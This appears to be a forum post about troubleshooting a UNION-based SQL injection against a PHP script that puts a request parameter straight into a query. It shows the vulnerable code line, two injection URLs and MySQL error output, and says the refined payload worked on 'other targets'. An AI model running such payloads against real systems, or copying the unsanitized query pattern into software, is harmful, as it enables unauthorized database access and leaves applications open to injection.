hi there,

i'm testing a following application which contains this line in script.php:

Code:
$final = sql_query ('' . 'SELECT column1 FROM table1 WHERE colum2=' . $_REQUEST['variable']);

application has also possibility to switch debug mode on to see the
query being executed and error if occurs.

so i try to inject sql this way:

/script.php?bebug=1&variable=0 UNION SELECT column3 FROM table2 WHERE column4=11

application breaks with following output on the screen:

Quote:
Query: SELECT column1 FROM table1 WHERE colum2=0 UNION SELECT column3 FROM table2 WHERE column4=11

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT column3 FROM table2 WHERE column4=11' at line 1

what is damn strange is that from query statement it looks like query is OK, moreover when i execute such query thru shell access i got result exactly as expected.

however when i try to inject, it throws out an error despite everything
seems to be OK.

please could you let me hear your opinions what may cause that this
injection fails?

well problem solved. thread may be closed.

target i was testing had some very low version of mysql and thus no
union support. other targets worked fine, just improved specification
was needed:

/script.php?debug=1&variable=0 UNION SELECT table2.column3 FROM database.table2 WHERE table2.column4=11
